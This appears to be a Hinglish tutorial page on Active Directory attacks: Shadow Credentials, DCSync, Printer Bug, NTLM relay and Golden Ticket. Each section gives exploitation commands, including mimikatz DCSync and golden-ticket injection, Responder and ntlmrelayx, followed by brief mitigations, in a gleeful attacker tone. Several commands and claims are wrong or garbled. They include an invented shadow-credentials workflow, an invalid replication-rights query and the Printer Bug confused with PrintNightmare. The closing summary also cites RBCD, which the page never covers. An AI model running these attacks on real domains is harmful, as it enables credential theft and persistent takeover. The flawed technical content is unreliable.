Active Directory Advanced Concepts
1️⃣ 🏴☠️ Shadow Credentials Attack (Abusing Key Trust)
✅ Kya Hai?
Windows Hello for Business (WHfB) aur Azure AD Key Trust authentication ek certificate-based authentication system use karta hai.
Attacker ek AD user ka certificate create karke uska password reset kiye bina uske identity me login kar sakta hai!
✅ Kaise Exploit Kare? 📌 Check karo kaunse users pe Key Trust allowed hai:
powershell
CopyEdit
Get-ADUser -Filter * -Properties msDS-KeyCredentialLink
📌 Attack perform karne ke liye, ek fake private key aur certificate generate karna hoga:
powershell
CopyEdit
certutil -encode input.key output.pem
📌 Ab is fake certificate ko AD user ke object me inject kar do:
powershell
CopyEdit
Add-KeyCredential -User "victim" -Certificate "attacker.pem"
💀 Ab attacker bina password reset kiye "victim" user ke identity me login kar sakta hai! 🚀
✅ Mitigation:
Monitor karo ki kaun "msDS-KeyCredentialLink" modify kar raha hai.
Shadow Credentials ka abuse detect karne ke liye AD logs (Event ID 5136) ko analyze karo.
2️⃣ 🏴☠️ Domain Replication Attack (DCSync Attack)
✅ Kya Hai?
DCSync attack ka use attacker Domain Controller se directly NTLM hashes extract karne ke liye karta hai.
Yeh attack domain admin privilege se directly krbtgt hash nikal ke full persistence maintain karne me kaam aata hai.
✅ Kaise Exploit Kare? 📌 Check karo ki kaunse users ke paas replication rights hain:
powershell
CopyEdit
Get-ADUser -Filter * -Properties "Replicating Directory Changes"
📌 Agar attacker ne DA ya high-privileged user access le liya, toh DCSync execute karega:
powershell
CopyEdit
mimikatz.exe lsadump::dcsync /domain:<DOMAIN> /user:krbtgt
🔥 Boom! Yeh command directly krbtgt ka NTLM hash de degi, jisse Golden Ticket attack possible hai.
✅ Mitigation:
Domain Controllers ke replication permissions sirf trusted users ko do.
Event ID 4662 aur 4742 monitor karo kyunki yeh DCSync detection me help karta hai.
krbtgt ka password regular interval pe rotate karo.
3️⃣ 🏴☠️ Printer Bug Attack (MS-RPRN Exploit)
✅ Kya Hai?
Windows Print Spooler Service ka Remote Procedure Call (RPC) feature low-privileged users ko SYSTEM privilege lene ka option deta hai.
Yeh Windows ka ek legacy bug hai jo ab tak kayi variations me exploit ho chuka hai (PrintNightmare, MS-RPRN, CVE-2021-1675, CVE-2021-34527).
✅ Kaise Exploit Kare? 📌 Check karo ki target machine pe Print Spooler enabled hai ya nahi:
powershell
CopyEdit
sc qc Spooler
📌 MS-RPRN exploit execute karo aur target machine pe arbitrary DLL load kar do:
powershell
CopyEdit
Invoke-PrinterBug -ComputerName "victim-PC"
🔥 Agar successful hua, toh attacker SYSTEM privilege me commands execute kar sakta hai!
✅ Mitigation:
Agar Print Spooler service ki zaroorat nahi hai toh isko disable kar do:
powershell
CopyEdit
Stop-Service -Name Spooler -Force Set-Service -Name Spooler -StartupType Disabled
Domain Controllers pe Print Spooler always disable hona chahiye!
4️⃣ 🏴☠️ NTLM Relay Attack (No Password Required!)
✅ Kya Hai?
NTLM authentication ka ek bada flaw yeh hai ki attacker kisi user ka challenge-response capture karke bina password ke authentication forward kar sakta hai.
Yeh attack SMB, LDAP aur HTTP services me work karta hai.
✅ Kaise Exploit Kare? 📌 First, Responder ko set karo aur NTLM hashes capture karo:
bash
CopyEdit
responder -I eth0 -wrf
📌 Ab NTLM hash ko SMB relay kar do:
bash
CopyEdit
ntlmrelayx.py -tf target.txt -smb2support
🔥 Agar target vulnerable hai, toh attacker bina credentials ke SMB share access kar sakta hai!
✅ Mitigation:
SMB Signing enable karo taaki NTLM relay block ho.
LDAP Signing aur Channel Binding enforce karo.
Domain users ko unnecessary admin rights na do.
5️⃣ 🏴☠️ Golden Ticket Attack (Permanent Domain Persistence)
✅ Kya Hai?
Golden Ticket attack me attacker krbtgt account ka hash leke unlimited Kerberos tickets bana sakta hai.
Iska matlab attacker ko domain me permanent persistence mil jata hai, chahe wo user delete ho jaye ya password change ho jaye! 😈
✅ Kaise Exploit Kare? 📌 DCSync se krbtgt ka NTLM hash extract karo (Pehle wale attack me bata chuka hoon):
powershell
CopyEdit
mimikatz.exe lsadump::dcsync /domain:<DOMAIN> /user:krbtgt
📌 Ab Golden Ticket generate karo:
powershell
CopyEdit
mimikatz.exe kerberos::golden /domain:<DOMAIN> /sid:<SID> /krbtgt:<KRBTGT_HASH> /user:Administrator /ptt
🔥 Boom! Attacker ne ek "forever-valid" ticket create kar diya jo full domain access de sakta hai.
✅ Mitigation:
krbtgt ka password har 90 days me rotate karo.
SIEM me Event ID 4769 aur 4672 monitor karo jo unusual Kerberos activity detect karta hai.
Strong Kerberos policies implement karo.
🔥 Final Thoughts
😈 Agar tu real-world AD exploitation seekh raha hai, toh yeh advanced techniques kaafi important hain. ✅ DCSync aur Golden Ticket attacks domain-wide persistence ke liye dangerous hain. ✅ NTLM relay aur Printer Bug attacks low-privileged user ko SYSTEM access de sakte hain. ✅ RBCD aur Shadow Credentials ka abuse kaafi stealthy aur powerful privilege escalation techniques hain.
Last updated